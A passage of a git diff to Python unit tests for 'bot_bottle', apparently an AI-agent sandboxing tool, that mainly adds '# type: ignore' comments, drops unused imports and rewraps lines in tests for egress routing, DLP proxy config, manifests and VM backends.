dropped the legacy four-sidecar shape entirely, so the bundle is the only thing exercised here.""" - def _render(self, **plan_kwargs): - return bottle_plan_to_compose(_plan(**plan_kwargs)) + def _render(self, **plan_kwargs: object) -> Any: # type: ignore + return bottle_plan_to_compose(_plan(**plan_kwargs)) # type: ignore def test_emits_two_services_minimal(self): spec = self._render() diff --git a/tests/unit/test_contrib_claude_provider.py b/tests/unit/test_contrib_claude_provider.py index a79fada..9225d90 100644 --- a/tests/unit/test_contrib_claude_provider.py +++ b/tests/unit/test_contrib_claude_provider.py @@ -14,7 +14,6 @@ from unittest.mock import MagicMock, patch from bot_bottle.agent_provider import ( AgentProvisionCommand, - AgentProvisionDir, AgentProvisionFile, AgentProvisionPlan, ) @@ -53,7 +52,7 @@ def _plan( agent_provision: AgentProvisionPlan | None = None, supervise: bool = False, ) -> DockerBottlePlan: - bottle_json: dict = {"agent_provider": {"template": "claude"}} + bottle_json: dict = {"agent_provider": {"template": "claude"}} # type: ignore if supervise: bottle_json["supervise"] = True manifest = Manifest.from_json_obj({ @@ -166,7 +165,7 @@ class TestClaudeProvisionSkills(unittest.TestCase): bottle = _make_bottle() with patch( "bot_bottle.backend.util.host_skill_dir", - side_effect=lambda n: f"/host/skills/{n}", + side_effect=lambda n: f"/host/skills/{n}", # type: ignore ), patch( "bot_bottle.contrib.claude.agent_provider.os.path.isdir", return_value=True, @@ -192,7 +191,7 @@ class TestClaudeProvisionSkills(unittest.TestCase): bottle = _make_bottle() with patch( "bot_bottle.backend.util.host_skill_dir", - side_effect=lambda n: f"/host/skills/{n}", + side_effect=lambda n: f"/host/skills/{n}", # type: ignore ), patch( "bot_bottle.contrib.claude.agent_provider.os.path.isdir", return_value=False, diff --git a/tests/unit/test_contrib_codex_provider.py b/tests/unit/test_contrib_codex_provider.py index c229ea8..7de7b0e 100644 --- a/tests/unit/test_contrib_codex_provider.py +++ b/tests/unit/test_contrib_codex_provider.py @@ -53,7 +53,7 @@ def _plan( agent_provision: AgentProvisionPlan | None = None, supervise: bool = False, ) -> DockerBottlePlan: - bottle_json: dict = {"agent_provider": {"template": "codex"}} + bottle_json: dict = {"agent_provider": {"template": "codex"}} # type: ignore if supervise: bottle_json["supervise"] = True manifest = Manifest.from_json_obj({ @@ -153,7 +153,7 @@ class TestCodexProvisionSkills(unittest.TestCase): bottle = _make_bottle() with patch( "bot_bottle.backend.util.host_skill_dir", - side_effect=lambda n: f"/host/skills/{n}", + side_effect=lambda n: f"/host/skills/{n}", # type: ignore ), patch( "bot_bottle.contrib.codex.agent_provider.os.path.isdir", return_value=True, diff --git a/tests/unit/test_contrib_gitea_deploy_key.py b/tests/unit/test_contrib_gitea_deploy_key.py index 095a0f8..b5a0402 100644 --- a/tests/unit/test_contrib_gitea_deploy_key.py +++ b/tests/unit/test_contrib_gitea_deploy_key.py @@ -6,9 +6,7 @@ import json import unittest import urllib.error from io import BytesIO -from pathlib import Path -from tempfile import mkdtemp -from unittest.mock import MagicMock, call, patch +from unittest.mock import MagicMock, patch from bot_bottle.contrib.gitea.deploy_key_provisioner import ( GiteaDeployKeyProvisioner, @@ -22,11 +20,11 @@ def _provisioner() -> GiteaDeployKeyProvisioner: ) -def _urlopen_response(body: dict, status: int = 200) -> MagicMock: +def _urlopen_response(body: dict, status: int = 200) -> MagicMock: # type: ignore resp = MagicMock() resp.read.return_value = json.dumps(body).encode() resp.status = status - resp.__enter__ = lambda s: s + resp.__enter__ = lambda s: s # type: ignore resp.__exit__ = MagicMock(return_value=False) return resp diff --git a/tests/unit/test_deploy_key_provisioner.py b/tests/unit/test_deploy_key_provisioner.py index 8a3a81f..4429327 100644 --- a/tests/unit/test_deploy_key_provisioner.py +++ b/tests/unit/test_deploy_key_provisioner.py @@ -3,7 +3,6 @@ from __future__ import annotations import unittest -from unittest.mock import patch from bot_bottle.deploy_key_provisioner import DeployKeyProvisioner, get_provisioner from bot_bottle.manifest import ManifestError diff --git a/tests/unit/test_docker_enumerate_active.py b/tests/unit/test_docker_enumerate_active.py index 2d58c8d..0ba71c2 100644 --- a/tests/unit/test_docker_enumerate_active.py +++ b/tests/unit/test_docker_enumerate_active.py @@ -99,7 +99,7 @@ class TestEnumerateActive(_FakeHomeMixin, unittest.TestCase): self._teardown_fake_home() def _stub(self, slugs: list[str], services_by_project: dict[str, set[str]]) -> None: - _enumerate.list_active_slugs = lambda **_: slugs + _enumerate.list_active_slugs = lambda **_: slugs # type: ignore _enumerate._query_services_by_project = lambda: services_by_project def test_no_active_slugs_returns_empty(self): diff --git a/tests/unit/test_docker_provision_git_user.py b/tests/unit/test_docker_provision_git_user.py index c83dd92..9e6fc39 100644 --- a/tests/unit/test_docker_provision_git_user.py +++ b/tests/unit/test_docker_provision_git_user.py @@ -11,7 +11,7 @@ from __future__ import annotations import tempfile import unittest from pathlib import Path -from unittest.mock import MagicMock, call +from unittest.mock import MagicMock from bot_bottle.agent_provider import AgentProvisionPlan from bot_bottle.backend import Bottle, BottleSpec, ExecResult @@ -24,11 +24,11 @@ from bot_bottle.pipelock import PipelockProxyPlan from bot_bottle.workspace import workspace_plan -def _plan(*, git_user: dict | None = None, +def _plan(*, git_user: dict | None = None, # type: ignore copy_cwd: bool = False, user_cwd: str = "/tmp/x", stage_dir: Path | None = None) -> DockerBottlePlan: - bottle_json: dict = {} + bottle_json: dict = {} # type: ignore if git_user is not None: bottle_json["git-gate"] = {"user": git_user} manifest = Manifest.from_json_obj({ diff --git a/tests/unit/test_docker_util_image.py b/tests/unit/test_docker_util_image.py index 941bebf..2b35a67 100644 --- a/tests/unit/test_docker_util_image.py +++ b/tests/unit/test_docker_util_image.py @@ -17,13 +17,13 @@ from bot_bottle.backend.docker import util as docker_mod from bot_bottle.workspace import WorkspacePlan -def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr=stderr, ) -def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: +def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=1, stdout="", stderr=stderr, ) @@ -110,7 +110,7 @@ class TestBuildImageWithCwd(unittest.TestCase): workdir="/guest/home/workspace", ) - def inspect_context(*args, **kwargs): + def inspect_context(*args, **kwargs): # type: ignore context = Path(args[0][-1]) staged = context / "workspace" self.assertTrue((staged / ".gitignore").is_file()) diff --git a/tests/unit/test_egress.py b/tests/unit/test_egress.py index ade8cff..bb8de25 100644 --- a/tests/unit/test_egress.py +++ b/tests/unit/test_egress.py @@ -17,7 +17,7 @@ from bot_bottle.manifest import Manifest from bot_bottle.yaml_subset import parse_yaml_subset -def _bottle(routes): +def _bottle(routes): # type: ignore return Manifest.from_json_obj({ "bottles": {"dev": {"egress": {"routes": routes}}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, @@ -257,8 +257,8 @@ class TestRenderRoutes(unittest.TestCase): will see, not the textual layout.""" @staticmethod - def _parsed(routes) -> list[dict]: - return parse_yaml_subset(egress_render_routes(routes))["routes"] + def _parsed(routes) -> list[dict]: # type: ignore + return parse_yaml_subset(egress_render_routes(routes))["routes"] # type: ignore def test_authenticated_route_serialised_with_auth_fields(self): b = _bottle([{ diff --git a/tests/unit/test_egress_addon_core.py b/tests/unit/test_egress_addon_core.py index 9df1388..0b1fa90 100644 --- a/tests/unit/test_egress_addon_core.py +++ b/tests/unit/test_egress_addon_core.py @@ -159,7 +159,7 @@ class TestMatchRoute(unittest.TestCase): def test_exact_match(self): r = match_route(self.ROUTES, "api.github.com") self.assertIsNotNone(r) - self.assertEqual("api.github.com", r.host) + self.assertEqual("api.github.com", r.host) # type: ignore def test_case_insensitive(self): # DNS hostnames are case-insensitive per RFC 1035; mitmproxy @@ -167,7 +167,7 @@ class TestMatchRoute(unittest.TestCase): # uppercase. Lookup must normalise. r = match_route(self.ROUTES, "API.GitHub.COM") self.assertIsNotNone(r) - self.assertEqual("api.github.com", r.host) + self.assertEqual("api.github.com", r.host) # type: ignore def test_no_match_returns_none(self): self.assertIsNone(match_route(self.ROUTES, "elsewhere.example")) @@ -370,7 +370,7 @@ class TestGitPushBlockFailFast(unittest.TestCase): self.send_header("Content-Length", "0") self.end_headers() - def log_message(self, _fmt, *_args): + def log_message(self, _fmt, *_args): # type: ignore pass server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler) diff --git a/tests/unit/test_egress_apply.py b/tests/unit/test_egress_apply.py index 29c63fd..ea54f20 100644 --- a/tests/unit/test_egress_apply.py +++ b/tests/unit/test_egress_apply.py @@ -21,10 +21,10 @@ _ROUTES_EMPTY = "routes: []\n" _ROUTES_ONE = 'routes:\n - host: "api.anthropic.com"\n' -def _routes(parsed: str) -> list[dict]: +def _routes(parsed: str) -> list[dict]: # type: ignore """Parse a YAML routes string and pull out the routes list, so tests can assert on shape directly.""" - return parse_yaml_subset(parsed)["routes"] + return parse_yaml_subset(parsed)["routes"] # type: ignore class TestValidateRoutesContent(unittest.TestCase): diff --git a/tests/unit/test_git_http_backend.py b/tests/unit/test_git_http_backend.py index c6c98b9..ae6ddbc 100644 --- a/tests/unit/test_git_http_backend.py +++ b/tests/unit/test_git_http_backend.py @@ -189,7 +189,7 @@ class TestGitHttpBackend(unittest.TestCase): try: urllib.request.urlopen(req, timeout=5) self.fail("expected HTTPError 403") - except urllib.error.HTTPError as e: + except urllib.error.HTTPError as e: # type: ignore self.assertEqual(403, e.code) self.assertIn(b"upstream fetch failed", e.read()) @@ -234,7 +234,7 @@ class TestGitHttpBackend(unittest.TestCase): try: urllib.request.urlopen(req, timeout=5) self.fail("expected HTTPError 403") - except urllib.error.HTTPError as e: + except urllib.error.HTTPError as e: # type: ignore self.assertEqual(403, e.code) logged = buf.getvalue() @@ -291,7 +291,7 @@ class TestContentLengthBounds(unittest.TestCase): try: with urllib.request.urlopen(req, timeout=3) as resp: return resp.status - except urllib.error.HTTPError as e: + except urllib.error.HTTPError as e: # type: ignore return e.code def test_non_numeric_content_length_returns_400(self): diff --git a/tests/unit/test_manifest_agent_git_user.py b/tests/unit/test_manifest_agent_git_user.py index 1e799e5..7771994 100644 --- a/tests/unit/test_manifest_agent_git_user.py +++ b/tests/unit/test_manifest_agent_git_user.py @@ -22,7 +22,7 @@ from pathlib import Path from bot_bottle.manifest import ManifestError, Manifest -def _error_message(callable_, *args, **kwargs) -> str: +def _error_message(callable_, *args, **kwargs) -> str: # type: ignore """Run `callable_` expecting a ManifestError; return its message.""" try: callable_(*args, **kwargs) @@ -31,11 +31,11 @@ def _error_message(callable_, *args, **kwargs) -> str: raise AssertionError("expected ManifestError was not raised") -def _manifest(*, bottle_user=None, agent_git=None) -> Manifest: - bottle: dict = {} +def _manifest(*, bottle_user=None, agent_git=None) -> Manifest: # type: ignore + bottle: dict = {} # type: ignore if bottle_user is not None: bottle = {"git-gate": {"user": bottle_user}} - agent: dict = {"skills": [], "prompt": "", "bottle": "dev"} + agent: dict = {"skills": [], "prompt": "", "bottle": "dev"} # type: ignore if agent_git is not None: agent["git-gate"] = agent_git return Manifest.from_json_obj({ diff --git a/tests/unit/test_manifest_egress.py b/tests/unit/test_manifest_egress.py index 1dba6a5..caf6cc4 100644 --- a/tests/unit/test_manifest_egress.py +++ b/tests/unit/test_manifest_egress.py @@ -7,17 +7,17 @@ auth omission means unauthenticated.""" import unittest -from bot_bottle.manifest import ManifestError, EgressRoute, Manifest +from bot_bottle.manifest import ManifestError, Manifest -def _bottle(routes): +def _bottle(routes): # type: ignore return Manifest.from_json_obj({ "bottles": {"dev": {"egress": {"routes": routes}}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, }).bottles["dev"] -def _provider_bottle(provider, routes): +def _provider_bottle(provider, routes): # type: ignore return Manifest.from_json_obj({ "bottles": { "dev": { @@ -29,7 +29,7 @@ def _provider_bottle(provider, routes): }).bottles["dev"] -def _provider_config_bottle(agent_provider): +def _provider_config_bottle(agent_provider): # type: ignore return Manifest.from_json_obj({ "bottles": {"dev": {"agent_provider": agent_provider}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, diff --git a/tests/unit/test_manifest_extends.py b/tests/unit/test_manifest_extends.py index d45ddb0..b1a20ad 100644 --- a/tests/unit/test_manifest_extends.py +++ b/tests/unit/test_manifest_extends.py @@ -15,7 +15,7 @@ import unittest from bot_bottle.manifest import ManifestError, Manifest -def _error_message(callable_, *args, **kwargs) -> str: +def _error_message(callable_, *args, **kwargs) -> str: # type: ignore """Run `callable_` expecting a ManifestError; return its message.""" try: callable_(*args, **kwargs) @@ -24,7 +24,7 @@ def _error_message(callable_, *args, **kwargs) -> str: raise AssertionError("expected ManifestError was not raised") -def _build(**bottles) -> Manifest: +def _build(**bottles) -> Manifest: # type: ignore """Build a manifest with the given bottles and one trivial agent referencing the first bottle (so the manifest is valid).""" first = next(iter(bottles)) diff --git a/tests/unit/test_manifest_git.py b/tests/unit/test_manifest_git.py index 16a7d8d..4a8a491 100644 --- a/tests/unit/test_manifest_git.py +++ b/tests/unit/test_manifest_git.py @@ -5,7 +5,7 @@ import unittest from bot_bottle.manifest import ManifestError, Manifest -def _manifest(repos: dict) -> dict: +def _manifest(repos: dict) -> dict: # type: ignore return { "bottles": {"dev": {"git-gate": {"repos": repos}}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, diff --git a/tests/unit/test_manifest_git_user.py b/tests/unit/test_manifest_git_user.py index e4dc3a2..324f898 100644 --- a/tests/unit/test_manifest_git_user.py +++ b/tests/unit/test_manifest_git_user.py @@ -5,7 +5,7 @@ import unittest from bot_bottle.manifest import ManifestError, GitUser, Manifest -def _error_message(callable_, *args, **kwargs) -> str: +def _error_message(callable_, *args, **kwargs) -> str: # type: ignore """Run `callable_` expecting a ManifestError; return its message.""" try: callable_(*args, **kwargs) @@ -14,7 +14,7 @@ def _error_message(callable_, *args, **kwargs) -> str: raise AssertionError("expected ManifestError was not raised") -def _manifest(git_user): +def _manifest(git_user): # type: ignore return { "bottles": {"dev": {"git-gate": {"user": git_user}}}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, diff --git a/tests/unit/test_pipelock_allowlist.py b/tests/unit/test_pipelock_allowlist.py index e6f6722..23383e1 100644 --- a/tests/unit/test_pipelock_allowlist.py +++ b/tests/unit/test_pipelock_allowlist.py @@ -15,14 +15,14 @@ from bot_bottle.pipelock import ( ) -def _bottle(spec): +def _bottle(spec): # type: ignore return Manifest.from_json_obj({ "bottles": {"dev": spec}, "agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}}, }).bottles["dev"] -def _routes(routes): +def _routes(routes): # type: ignore return {"egress": {"routes": routes}} diff --git a/tests/unit/test_pipelock_apply.py b/tests/unit/test_pipelock_apply.py index db49a63..8a35729 100644 --- a/tests/unit/test_pipelock_apply.py +++ b/tests/unit/test_pipelock_apply.py @@ -74,7 +74,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase): "dlp": {"include_defaults": True, "scan_env": True}, "request_body_scanning": {"action": "block"}, } - rendered = pipelock_render_yaml(cfg) + rendered = pipelock_render_yaml(cfg) # type: ignore parsed = parse_yaml_subset(rendered) self.assertEqual(["a.example", "b.example"], parsed["api_allowlist"]) self.assertEqual(1, parsed["version"]) @@ -97,7 +97,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase): "passthrough_domains": ["api.anthropic.com"], }, } - parsed = parse_yaml_subset(pipelock_render_yaml(cfg)) + parsed = parse_yaml_subset(pipelock_render_yaml(cfg)) # type: ignore parsed["api_allowlist"] = ["new.example"] rerendered = pipelock_render_yaml(parsed) roundtripped = parse_yaml_subset(rerendered) diff --git a/tests/unit/test_pipelock_yaml.py b/tests/unit/test_pipelock_yaml.py index e565694..52e6dd8 100644 --- a/tests/unit/test_pipelock_yaml.py +++ b/tests/unit/test_pipelock_yaml.py @@ -10,7 +10,7 @@ import os import tempfile import unittest from pathlib import Path -from typing import Any, cast +from typing import cast from bot_bottle.manifest import Manifest from bot_bottle.pipelock import ( diff --git a/tests/unit/test_plan_print_parity.py b/tests/unit/test_plan_print_parity.py index 10328f4..e0fdb29 100644 --- a/tests/unit/test_plan_print_parity.py +++ b/tests/unit/test_plan_print_parity.py @@ -220,7 +220,11 @@ class TestEgressPrintParity(unittest.TestCase): indent_prefix = ln[:idx] result.append(ln) elif collecting: - if ln.startswith(indent_prefix) and "egress" not in ln and ":" not in ln.lstrip()[:20]: + if ( + ln.startswith(indent_prefix) # type: ignore + and "egress" not in ln + and ":" not in ln.lstrip()[:20] + ): result.append(ln) else: break diff --git a/tests/unit/test_smolmachines_cleanup.py b/tests/unit/test_smolmachines_cleanup.py index 1e585ae..92fa8bf 100644 --- a/tests/unit/test_smolmachines_cleanup.py +++ b/tests/unit/test_smolmachines_cleanup.py @@ -18,7 +18,7 @@ from bot_bottle.backend.smolmachines.bottle_cleanup_plan import ( ) -def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr=stderr, ) @@ -35,7 +35,7 @@ class TestPrepareCleanup(unittest.TestCase): self.assertTrue(plan.empty) def test_lists_machines_bundles_networks(self): - def fake_run(argv, *a, **kw): + def fake_run(argv, *a, **kw): # type: ignore if argv[:3] == ["smolvm", "machine", "ls"]: return _ok(stdout=( '[{"name":"bot-bottle-a-1","state":"running"},' @@ -92,7 +92,7 @@ class TestCleanup(unittest.TestCase): ) calls: list[list[str]] = [] - def fake_run(argv, *a, **kw): + def fake_run(argv, *a, **kw): # type: ignore calls.append(list(argv[:4])) return _ok() @@ -124,11 +124,13 @@ class TestCleanup(unittest.TestCase): ) results = iter([ _ok(), # stop succeeds - subprocess.CompletedProcess(args=[], returncode=1, stdout="", stderr="boom"), # delete fails + subprocess.CompletedProcess( + args=[], returncode=1, stdout="", stderr="boom" + ), # delete fails _ok(), # bundle rm succeeds ]) - def fake_run(argv, *a, **kw): + def fake_run(argv, *a, **kw): # type: ignore return next(results) with patch.object(cleanup.subprocess, "run", side_effect=fake_run), \ diff --git a/tests/unit/test_smolmachines_launch_image.py b/tests/unit/test_smolmachines_launch_image.py index 07685c9..add3fab 100644 --- a/tests/unit/test_smolmachines_launch_image.py +++ b/tests/unit/test_smolmachines_launch_image.py @@ -76,19 +76,19 @@ class TestEnsureSmolmachine(unittest.TestCase): ) class _Reg: - def __enter__(self_inner): + def __enter__(self_inner): # type: ignore return RegistryHandle( network="cb-net-xyz", push_endpoint="cb-registry-xyz:5000", pull_endpoint="localhost:54321", ) - def __exit__(self_inner, *exc): + def __exit__(self_inner, *exc): # type: ignore return False calls: list[str] = [] - def record(name): - def _f(*a, **kw): + def record(name): # type: ignore + def _f(*a, **kw): # type: ignore calls.append(name) return _f diff --git a/tests/unit/test_smolmachines_local_registry.py b/tests/unit/test_smolmachines_local_registry.py index a0277ba..e6f840c 100644 --- a/tests/unit/test_smolmachines_local_registry.py +++ b/tests/unit/test_smolmachines_local_registry.py @@ -15,13 +15,13 @@ from unittest.mock import patch from bot_bottle.backend.smolmachines import local_registry -def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr=stderr, ) -def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: +def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=1, stdout="", stderr=stderr, ) @@ -149,7 +149,7 @@ class TestEphemeralRegistry(unittest.TestCase): def test_unique_session_ids_per_call(self): sessions: list[tuple[str, str]] = [] - def capture(argv, *a, **kw): + def capture(argv, *a, **kw): # type: ignore if argv[:3] == ["docker", "network", "create"]: return _ok() if argv[:2] == ["docker", "run"]: @@ -242,7 +242,7 @@ class _FakeSocket: def __enter__(self): return self - def __exit__(self, *exc): + def __exit__(self, *exc): # type: ignore return False diff --git a/tests/unit/test_smolmachines_loopback_alias.py b/tests/unit/test_smolmachines_loopback_alias.py index 4fcc537..7751af6 100644 --- a/tests/unit/test_smolmachines_loopback_alias.py +++ b/tests/unit/test_smolmachines_loopback_alias.py @@ -11,7 +11,6 @@ import json import sqlite3 import subprocess import tempfile -import threading import unittest from pathlib import Path from unittest.mock import patch @@ -19,13 +18,13 @@ from unittest.mock import patch from bot_bottle.backend.smolmachines import loopback_alias -def _ok(stdout: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr="", ) -def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: +def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=1, stdout="", stderr=stderr, ) @@ -79,7 +78,7 @@ class TestEnsurePool(unittest.TestCase): # lo0 only has 16+17 already; sudo runs for 18..31 (14 missing). runs: list[list[str]] = [] - def fake_run(argv, *a, **kw): + def fake_run(argv, *a, **kw): # type: ignore runs.append(argv) if argv[:2] == ["/sbin/ifconfig", "lo0"]: return _ok(stdout=_LO0_PARTIAL) @@ -98,7 +97,7 @@ class TestEnsurePool(unittest.TestCase): ) def test_sudo_failure_dies(self): - def fake_run(argv, *a, **kw): + def fake_run(argv, *a, **kw): # type: ignore if argv[:2] == ["/sbin/ifconfig", "lo0"]: return _ok(stdout=_LO0_DEFAULT) if argv[:1] == ["sudo"]: @@ -153,7 +152,7 @@ class TestAllocateLock(unittest.TestCase): import fcntl as fcntl_mod flock_calls: list[int] = [] - def record_flock(fd, op): + def record_flock(fd, op): # type: ignore flock_calls.append(op) with tempfile.TemporaryDirectory() as tmp: diff --git a/tests/unit/test_smolmachines_prepare.py b/tests/unit/test_smolmachines_prepare.py index ea211f2..c851f76 100644 --- a/tests/unit/test_smolmachines_prepare.py +++ b/tests/unit/test_smolmachines_prepare.py @@ -46,7 +46,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase): orig_root = _sup.bot_bottle_root _sup.bot_bottle_root = lambda: Path(tmp) / ".bot-bottle" # type: ignore[assignment] - host_env = {**os.environ, **(extra_host_env or {})} + host_env = {**os.environ, **(extra_host_env or {})} # type: ignore try: with ( @@ -59,13 +59,15 @@ class TestSmolmachinesResolveEnv(unittest.TestCase): patch("bot_bottle.backend.smolmachines.prepare.PipelockProxy") as mock_pl, patch("bot_bottle.backend.smolmachines.prepare.Egress") as mock_eg, patch("bot_bottle.backend.smolmachines.prepare.Supervise"), - patch("bot_bottle.backend.smolmachines.prepare.agent_provision_plan") as mock_app, + patch( + "bot_bottle.backend.smolmachines.prepare.agent_provision_plan" + ) as mock_app, patch("bot_bottle.backend.smolmachines.prepare.runtime_for"), ): mock_gg.return_value.prepare.return_value = MagicMock() mock_pl.return_value.prepare.return_value = MagicMock() mock_eg.return_value.prepare.return_value = MagicMock() - def _make_provision(**kwargs): + def _make_provision(**kwargs): # type: ignore return AgentProvisionPlan( template="claude", command="claude", @@ -74,7 +76,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase): image="bot-bottle-claude:latest", guest_env=dict(kwargs.get("guest_env") or {}), ) - mock_app.side_effect = lambda **kw: _make_provision(**kw) + mock_app.side_effect = lambda **kw: _make_provision(**kw) # type: ignore from bot_bottle.backend.smolmachines.prepare import resolve_plan plan = resolve_plan(spec, stage_dir=stage) diff --git a/tests/unit/test_smolmachines_provision.py b/tests/unit/test_smolmachines_provision.py index c48aa01..48d8d60 100644 --- a/tests/unit/test_smolmachines_provision.py +++ b/tests/unit/test_smolmachines_provision.py @@ -55,7 +55,7 @@ def _exec_scripts(bottle: MagicMock) -> list[str]: return [c.args[0] for c in bottle.exec.call_args_list] -def _exec_users(bottle: MagicMock) -> list[str]: +def _exec_users(bottle: MagicMock) -> list[str]: # type: ignore """user= kwarg from each bottle.exec call, in order.""" return [c.kwargs.get("user", "node") for c in bottle.exec.call_args_list] @@ -64,8 +64,8 @@ def _plan( *, agent_prompt: str = "", skills: list[str] | None = None, - git: list[GitEntry] = (), - git_user: dict | None = None, + git: list[GitEntry] = (), # type: ignore + git_user: dict | None = None, # type: ignore copy_cwd: bool = False, user_cwd: str = "/tmp/x", stage_dir: Path | None = None, @@ -80,8 +80,8 @@ def _plan( agent_provider_template: str = "claude", guest_env: dict[str, str] | None = None, ) -> SmolmachinesBottlePlan: - bottle_json: dict = {} - git_gate_json: dict = {} + bottle_json: dict = {} # type: ignore + git_gate_json: dict = {} # type: ignore if git: git_gate_json["repos"] = { g.Name: { diff --git a/tests/unit/test_smolmachines_pty_resize.py b/tests/unit/test_smolmachines_pty_resize.py index 4ddba6b..a0a3795 100644 --- a/tests/unit/test_smolmachines_pty_resize.py +++ b/tests/unit/test_smolmachines_pty_resize.py @@ -85,7 +85,7 @@ class TestReadWinsize(unittest.TestCase): calls: list[int] = [] - def fake_ioctl(fd, req, buf): + def fake_ioctl(fd, req, buf): # type: ignore calls.append(fd) if fd == 0: raise OSError("stdin not a tty") @@ -105,7 +105,7 @@ class TestReadWinsize(unittest.TestCase): struct.pack("hhhh", 24, 80, 0, 0), # stdout: real ]) - def fake_ioctl(fd, req, buf): + def fake_ioctl(fd, req, buf): # type: ignore return next(responses) with patch.object(pty_resize.fcntl, "ioctl", side_effect=fake_ioctl): @@ -153,7 +153,7 @@ class TestStartupSyncDeferred(unittest.TestCase): self.assertEqual(0, rc) # Timer scheduled with the documented delay constant. timer_cls.assert_called_once() - delay, callback = timer_cls.call_args.args + delay, callback = timer_cls.call_args.args # type: ignore self.assertEqual(pty_resize._STARTUP_SYNC_DELAY_SEC, delay) # _push_size never called synchronously — the only path to # it is via the (mocked) timer's callback firing. diff --git a/tests/unit/test_smolmachines_sidecar_bundle.py b/tests/unit/test_smolmachines_sidecar_bundle.py index 84f181f..5426770 100644 --- a/tests/unit/test_smolmachines_sidecar_bundle.py +++ b/tests/unit/test_smolmachines_sidecar_bundle.py @@ -24,19 +24,19 @@ from bot_bottle.backend.smolmachines.sidecar_bundle import ( ) -def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr=stderr, ) -def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: +def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=1, stdout="", stderr=stderr, ) -def _spec(**kwargs) -> BundleLaunchSpec: +def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore defaults = dict( slug="demo-abc12", network_name="bot-bottle-bundle-demo-abc12", @@ -45,7 +45,7 @@ def _spec(**kwargs) -> BundleLaunchSpec: bundle_ip="192.168.50.2", ) defaults.update(kwargs) - return BundleLaunchSpec(**defaults) + return BundleLaunchSpec(**defaults) # type: ignore class TestNamingHelpers(unittest.TestCase): @@ -69,7 +69,7 @@ class TestNamingHelpers(unittest.TestCase): class TestNetworkLifecycle(unittest.TestCase): - def _patch_run(self, **kwargs): + def _patch_run(self, **kwargs): # type: ignore return patch( "bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run", **kwargs, @@ -200,7 +200,7 @@ class TestEnsureBundleImage(unittest.TestCase): class TestStopBundle(unittest.TestCase): - def _patch_run(self, **kwargs): + def _patch_run(self, **kwargs): # type: ignore return patch( "bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run", **kwargs, diff --git a/tests/unit/test_smolmachines_smolvm.py b/tests/unit/test_smolmachines_smolvm.py index efc1c29..e693c57 100644 --- a/tests/unit/test_smolmachines_smolvm.py +++ b/tests/unit/test_smolmachines_smolvm.py @@ -28,13 +28,13 @@ from bot_bottle.backend.smolmachines.smolvm import ( ) -def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: +def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=0, stdout=stdout, stderr=stderr, ) -def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: +def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore return subprocess.CompletedProcess( args=[], returncode=1, stdout="", stderr=stderr, ) diff --git a/tests/unit/test_supervise.py b/tests/unit/test_supervise.py index 8f71225..1f8671d 100644 --- a/tests/unit/test_supervise.py +++ b/tests/unit/test_supervise.py @@ -37,7 +37,11 @@ from bot_bottle.supervise import ( FIXED_TS = datetime(2026, 5, 25, 12, 0, 0, tzinfo=timezone.utc) -def _proposal(tool: str = TOOL_EGRESS_BLOCK, proposed: str = "{}", justification: str = "need a route") -> Proposal: +def _proposal( + tool: str = TOOL_EGRESS_BLOCK, + proposed: str = "{}", + justification: str = "need a route", +) -> Proposal: return Proposal.new( bottle_slug="dev", tool=tool, @@ -332,10 +336,10 @@ class TestToolConstants(unittest.TestCase): class _StubSupervise(supervise.Supervise): """Concrete Supervise subclass for testing the prepare template.""" - def start(self, plan): + def start(self, plan): # type: ignore return f"stub-{plan.slug}" - def stop(self, target): + def stop(self, target): # type: ignore return None diff --git a/tests/unit/test_supervise_cli.py b/tests/unit/test_supervise_cli.py index 0c36ed0..b02bf3c 100644 --- a/tests/unit/test_supervise_cli.py +++ b/tests/unit/test_supervise_cli.py @@ -133,14 +133,14 @@ class TestApproveReject(_FakeHomeMixin, unittest.TestCase): self._original_apply_capability = 